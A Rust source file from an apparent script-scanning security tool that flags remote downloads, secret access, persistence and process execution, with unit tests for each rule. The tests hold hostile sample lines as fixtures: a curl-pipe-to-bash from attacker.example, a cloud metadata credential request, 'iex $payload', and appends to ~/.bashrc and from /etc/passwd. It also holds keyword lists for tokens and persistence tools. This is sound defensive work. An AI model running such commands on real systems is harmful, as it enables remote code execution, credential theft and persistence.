use super::manifests::strip_inline_hash_comment;
use super::ArtifactLink;
use crate::artifact_graph::{ArtifactCapability, ArtifactCapabilityFact, ArtifactRelation};
use crate::detectors::patterns::{line_invokes_shell_or_interpreter, RE_SHELL_SOURCE};
use crate::detectors::scripts::{
detect_deferred_execution, detect_file_secret_to_network_flow, detect_injection_patterns,
detect_node_process_exec, detect_node_secret_fs_access, detect_powershell_dynamic_exec,
detect_powershell_persistence, detect_python_exec_network, detect_python_secret_system_access,
detect_remote_binary_downloads, detect_shell_persistence_write, detect_shell_side_effects,
detect_typosquatted_install, references_dotenv_file,
};
use crate::findings::ArtifactKind;
use crate::services::ArtifactOrchestratorService;
use std::path::Path;
const HASH_COMMENT_LANGUAGES: &[&str] = &[
"sh", "bash", "zsh", "ksh", "fish", "py", "rb", "pl", "yaml", "yml", "ps1", "psm1", "psd1",
];
pub(super) fn strip_comments_for_detection(content: &str, language: &str) -> String {
if !HASH_COMMENT_LANGUAGES.contains(&language) {
return content.to_string();
}
let mut out = String::with_capacity(content.len());
let mut first = true;
for line in content.lines() {
if !first {
out.push('\n');
}
first = false;
out.push_str(strip_inline_hash_comment(line));
}
if content.ends_with('\n') {
out.push('\n');
}
out
}
pub(crate) fn analyze_script(
artifact_orchestration: &ArtifactOrchestratorService,
path: &Path,
content: &str,
) -> Vec<crate::findings::Finding> {
let artifact_path = path.display().to_string();
let language = path
.extension()
.and_then(|ext| ext.to_str())
.map(str::to_ascii_lowercase)
.unwrap_or_default();
let comment_stripped = strip_comments_for_detection(content, &language);
let lower = comment_stripped.to_ascii_lowercase();
let mut findings = Vec::new();
findings.extend(detect_remote_binary_downloads(
&lower,
&comment_stripped,
&artifact_path,
));
findings.extend(detect_deferred_execution(
&lower,
&comment_stripped,
&artifact_path,
));
findings.extend(detect_node_process_exec(&lower, &language, &artifact_path));
findings.extend(detect_python_exec_network(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_python_secret_system_access(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_powershell_dynamic_exec(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_powershell_persistence(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_shell_side_effects(&lower, &language, &artifact_path));
findings.extend(detect_shell_persistence_write(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_node_secret_fs_access(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_file_secret_to_network_flow(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_typosquatted_install(
&lower,
&language,
&artifact_path,
));
findings.extend(detect_injection_patterns(
&lower,
&comment_stripped,
&language,
&artifact_path,
));
findings.extend(artifact_orchestration.permission_and_network_findings(
path,
&comment_stripped,
ArtifactKind::ReferencedArtifact,
));
findings
}
pub(crate) fn script_capabilities(content: &str) -> Vec<ArtifactCapabilityFact> {
let lower = content.to_ascii_lowercase();
let mut capabilities = Vec::new();
if lower.contains("curl ")
|| lower.contains("wget ")
|| lower.contains("invoke-webrequest")
|| lower.contains("http://")
|| lower.contains("https://")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::NetworkAccess,
));
}
if lower.lines().any(line_invokes_shell_or_interpreter)
|| lower.contains("npm install")
|| lower.contains("pip install")
|| lower.contains("cargo install")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::InstallExecution,
));
}
if lower.contains("subprocess.")
|| lower.contains("os.system(")
|| lower.contains("os.execvp(")
|| lower.contains("os.execvpe(")
|| lower.contains("child_process.exec(")
|| lower.contains("child_process.spawn(")
|| lower.contains("child_process.execsync(")
|| lower.contains("child_process.spawnsync(")
|| lower.contains("spawn(")
|| lower.contains("exec(")
|| lower.contains("start-process")
|| lower.contains("iex ")
|| lower.contains("iex(")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::ProcessExecution,
));
}
if lower.contains("process.env")
|| lower.contains("os.environ")
|| lower.contains("getenv(")
|| references_dotenv_file(&lower)
|| lower.contains("access_token")
|| lower.contains("api_token")
|| lower.contains("auth_token")
|| lower.contains("bearer_token")
|| lower.contains("secret_key")
|| lower.contains("client_secret")
|| lower.contains("_authtoken")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::SecretAccess,
));
}
if lower.contains("crontab")
|| lower.contains("schtasks")
|| lower.contains("launchctl")
|| lower.contains("runonce")
|| lower.contains("autostart")
|| lower.contains("register-scheduledtask")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::PersistenceSurface,
));
}
if lower.contains("writefilesync(")
|| lower.contains("tee ")
|| contains_shell_append_redirect(&lower)
|| lower.contains("> /etc/")
|| lower.contains("set-content")
{
capabilities.push(ArtifactOrchestratorService::observed_capability(
ArtifactCapability::FilesystemWrite,
));
}
capabilities
}
fn contains_shell_append_redirect(lower: &str) -> bool {
let bytes = lower.as_bytes();
let mut search_start = 0;
while let Some(rel) = lower[search_start..].find(">>") {
let abs = search_start + rel;
let after_idx = abs + 2;
let before = abs.checked_sub(1).and_then(|i| bytes.get(i).copied());
let after_run = lower[after_idx..]
.bytes()
.find(|b| *b != b' ' && *b != b'\t');
match after_run {
None => return true,
Some(b'\n') | Some(b'\r') => {}
Some(b'0'..=b'9') => {}
Some(b'/' | b'~' | b'$' | b'"' | b'\'' | b'.') => return true,
Some(b) if b.is_ascii_alphabetic() || b == b'_' => match before {
None | Some(b' ' | b'\t' | b'\n' | b'\r') => return true,
_ => {}
},
_ => {}
}
search_start = abs + 2;
}
false
}
pub(crate) fn script_relations(content: &str) -> Vec<ArtifactLink> {
let lower = content.to_ascii_lowercase();
let mut links = Vec::new();
if lower.contains("curl ") || lower.contains("wget ") || lower.contains("invoke-webrequest") {
links.push(ArtifactLink {
target: "remote-resource".to_string(),
relation: ArtifactRelation::Downloads,
});
}
if lower.lines().any(line_invokes_shell_or_interpreter)
|| lower.contains("start-process")
|| lower.contains("subprocess.")
|| lower.contains("os.system(")
|| lower.contains("exec(")
|| lower.contains("spawn(")
|| lower.contains("child_process")
|| lower.contains("iex ")
|| lower.contains("iex(")
{
links.push(ArtifactLink {
target: "process".to_string(),
relation: ArtifactRelation::Executes,
});
}
if lower.contains("import ")
|| lower.contains("require(")
|| lower.contains("source ")
|| RE_SHELL_SOURCE.is_match(&lower)
{
links.push(ArtifactLink {
target: "runtime-module".to_string(),
relation: ArtifactRelation::Loads,
});
}
if lower.contains("crontab")
|| lower.contains("schtasks")
|| lower.contains("launchctl")
|| lower.contains("runonce")
|| lower.contains("autostart")
|| lower.contains("register-scheduledtask")
{
links.push(ArtifactLink {
target: "persistence-surface".to_string(),
relation: ArtifactRelation::Persists,
});
}
if lower.contains("http://") || lower.contains("https://") || lower.contains("socket.") {
links.push(ArtifactLink {
target: "network".to_string(),
relation: ArtifactRelation::ConnectsTo,
});
}
if lower.contains("open(")
|| lower.contains("readfilesync(")
|| lower.contains("cat ")
|| lower.contains("rg ")
{
links.push(ArtifactLink {
target: "filesystem".to_string(),
relation: ArtifactRelation::Reads,
});
}
if lower.contains("writefilesync(")
|| lower.contains("tee ")
|| contains_shell_append_redirect(&lower)
|| lower.contains("> /etc/")
|| lower.contains("set-content")
{
links.push(ArtifactLink {
target: "filesystem".to_string(),
relation: ArtifactRelation::Writes,
});
}
if lower.contains("process.env")
|| lower.contains("os.environ")
|| lower.contains("getenv(")
|| references_dotenv_file(&lower)
|| lower.contains("access_token")
|| lower.contains("api_token")
|| lower.contains("auth_token")
|| lower.contains("bearer_token")
|| lower.contains("secret_key")
|| lower.contains("client_secret")
|| lower.contains("_authtoken")
{
links.push(ArtifactLink {
target: "secrets".to_string(),
relation: ArtifactRelation::AccessesSecrets,
});
}
links
}
#[cfg(test)]
mod tests {
use super::*;
fn capability_present(caps: &[ArtifactCapabilityFact], target: ArtifactCapability) -> bool {
caps.iter().any(|fact| fact.capability == target)
}
fn relation_target_present(links: &[ArtifactLink], target: &str) -> bool {
links.iter().any(|link| link.target == target)
}
#[test]
fn script_capabilities_detects_bash_token() {
let content = "bash install.sh\n";
let caps = script_capabilities(content);
assert!(capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
#[test]
fn script_capabilities_detects_sh_at_column_zero() {
let content = "sh install.sh\n";
let caps = script_capabilities(content);
assert!(capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
#[test]
fn script_capabilities_skips_publish_word() {
let content = "npm run publish\n";
let caps = script_capabilities(content);
assert!(!capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
#[test]
fn script_capabilities_keeps_npm_install_phrase() {
let content = "npm install foo\n";
let caps = script_capabilities(content);
assert!(capability_present(
&caps,
ArtifactCapability::InstallExecution
));
}
#[test]
fn script_relations_detects_bash_token() {
let content = "bash install.sh\n";
let links = script_relations(content);
assert!(relation_target_present(&links, "process"));
}
#[test]
fn script_relations_skips_publish_word() {
let content = "npm run publish\n";
let links = script_relations(content);
assert!(!relation_target_present(&links, "process"));
}
#[test]
fn script_relations_skips_finish_step() {
let content = "echo \"please finish setup\"\n";
let links = script_relations(content);
assert!(!relation_target_present(&links, "process"));
}
#[test]
fn script_relations_records_executes_for_iex_alias() {
let content = "iex $payload\n";
let links = script_relations(content);
assert!(
relation_target_present(&links, "process"),
"`iex $payload` must produce an Executes edge; got {links:?}",
);
}
#[test]
fn iex_flips_both_capability_and_relation() {
let content = "iex $payload\n";
let caps = script_capabilities(content);
let links = script_relations(content);
assert!(caps
.iter()
.any(|c| c.capability == ArtifactCapability::ProcessExecution));
assert!(relation_target_present(&links, "process"));
}
#[test]
fn analyze_script_skips_remote_download_inside_shell_comment() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "echo done # was: curl https://old/install.sh\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "SCRIPT_REMOTE_BINARY_DOWNLOAD"),
"documentation comment must not fire SCRIPT_REMOTE_BINARY_DOWNLOAD; got {findings:?}",
);
}
#[test]
fn analyze_script_skips_remote_download_inside_python_comment() {
let path = std::path::Path::new("/pkg/setup.py");
let content = "x = 1 # was using curl https://old/install.sh\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "SCRIPT_REMOTE_BINARY_DOWNLOAD"),
"Python comment must not fire SCRIPT_REMOTE_BINARY_DOWNLOAD; got {findings:?}",
);
}
#[test]
fn analyze_script_still_detects_uncommented_remote_download() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "curl https://attacker.example/install.sh | bash\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
findings
.iter()
.any(|f| f.rule_id == "SCRIPT_REMOTE_BINARY_DOWNLOAD"),
"uncommented curl pipe-to-bash MUST still fire; got {findings:?}",
);
}
#[test]
fn analyze_script_skips_internal_network_inside_shell_comment() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "echo done # was: curl 169.254.169.254/latest/meta-data\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "METADATA_SERVICE_ACCESS"),
"comment must not fire METADATA_SERVICE_ACCESS; got {findings:?}",
);
assert!(
!findings
.iter()
.any(|f| f.rule_id == "INTERNAL_NETWORK_ACCESS"),
"comment must not fire INTERNAL_NETWORK_ACCESS; got {findings:?}",
);
}
#[test]
fn analyze_script_still_detects_uncommented_metadata_target() {
let path = std::path::Path::new("/pkg/install.sh");
let content = "curl http://169.254.169.254/latest/meta-data/iam/\n";
let service = ArtifactOrchestratorService::new();
let findings = analyze_script(&service, path, content);
assert!(
findings
.iter()
.any(|f| f.rule_id == "METADATA_SERVICE_ACCESS"),
"uncommented metadata-service hit MUST still fire; got {findings:?}",
);
}
#[test]
fn strip_comments_for_detection_preserves_line_count() {
let content = "alpha\n# pure comment line\nbeta # inline\n";
let stripped = strip_comments_for_detection(content, "sh");
assert_eq!(
stripped.lines().count(),
content.lines().count(),
"line count MUST be preserved; got {stripped:?}",
);
assert_eq!(stripped.ends_with('\n'), content.ends_with('\n'));
}
#[test]
fn strip_comments_for_detection_leaves_javascript_untouched() {
let js = "const x = 'ok'; // comment\n";
let stripped = strip_comments_for_detection(js, "js");
assert_eq!(stripped, js, "`.js` content must round-trip unchanged");
}
#[test]
fn references_dotenv_file_rejects_lookalike_filenames() {
let benign = [
"echo .envrc",
"load .envelope",
"open(\".environment/default.cfg\")",
"read .envconfig",
"MY_ENV=production",
"subscriber.envoy(message)",
"config = parse(.environments)",
];
for sample in benign {
assert!(
!references_dotenv_file(&sample.to_ascii_lowercase()),
"must NOT classify lookalike as dotenv reference: {sample:?}"
);
}
}
#[test]
fn references_dotenv_file_fires_on_genuine_dotenv_references() {
let positive = [
"require('dotenv').config()",
"load_dotenv()",
"import dotenv",
"open(\".env\")",
"open('.env')",
"open(\"/etc/.env\")",
"cat .env",
"read .env",
"fs.readFile(\"./.env\")",
"with open('.env') as f:",
];
for sample in positive {
assert!(
references_dotenv_file(&sample.to_ascii_lowercase()),
"must classify genuine dotenv reference: {sample:?}"
);
}
}
#[test]
fn script_capabilities_does_not_emit_secret_access_for_envrc_lookalikes() {
let content =
"echo \"setting up direnv\"\nsource .envrc\nfetch https://example.invalid/x\n";
let caps = script_capabilities(content);
assert!(
!capability_present(&caps, ArtifactCapability::SecretAccess),
"direnv .envrc reference must NOT raise SecretAccess; got {caps:?}"
);
}
#[test]
fn script_relations_does_not_emit_secrets_for_envelope_lookalikes() {
let content = "open_envelope = lambda f: parse(f)\nread .envelope\n";
let links = script_relations(content);
assert!(
!relation_target_present(&links, "secrets"),
".envelope reference must NOT raise AccessesSecrets; got {links:?}"
);
}
#[test]
fn script_capabilities_still_raises_secret_access_for_load_dotenv() {
let content = "from dotenv import load_dotenv\nload_dotenv()\n";
let caps = script_capabilities(content);
assert!(capability_present(&caps, ArtifactCapability::SecretAccess));
let links = script_relations(content);
assert!(relation_target_present(&links, "secrets"));
}
#[test]
fn script_capabilities_does_not_fire_filesystem_write_on_bitshift() {
for sample in [
"shift = flags >> 3\n",
"let x = value >> 8;\n",
"result = num >> 2",
"logits >> 2",
"x>>shift", ] {
let caps = script_capabilities(sample);
assert!(
!capability_present(&caps, ArtifactCapability::FilesystemWrite),
"must NOT raise FilesystemWrite on bitshift: {sample:?} -> {caps:?}"
);
let links = script_relations(sample);
assert!(
!relation_target_present(&links, "filesystem"),
"must NOT raise filesystem Writes edge on bitshift: {sample:?} -> {links:?}"
);
}
}
#[test]
fn script_capabilities_fires_filesystem_write_on_shell_append() {
for sample in [
"echo done >> /tmp/log.txt\n",
"cat /etc/passwd >> dump.log\n",
"echo $payload >> ~/.bashrc",
"echo done >> \"$HOME/.zshrc\"\n",
"echo data >>'/tmp/out'",
] {
let caps = script_capabilities(sample);
assert!(
capability_present(&caps, ArtifactCapability::FilesystemWrite),
"must raise FilesystemWrite on shell append: {sample:?} -> {caps:?}"
);
let links = script_relations(sample);
assert!(
relation_target_present(&links, "filesystem"),
"must raise filesystem Writes edge on shell append: {sample:?} -> {links:?}"
);
}
}
}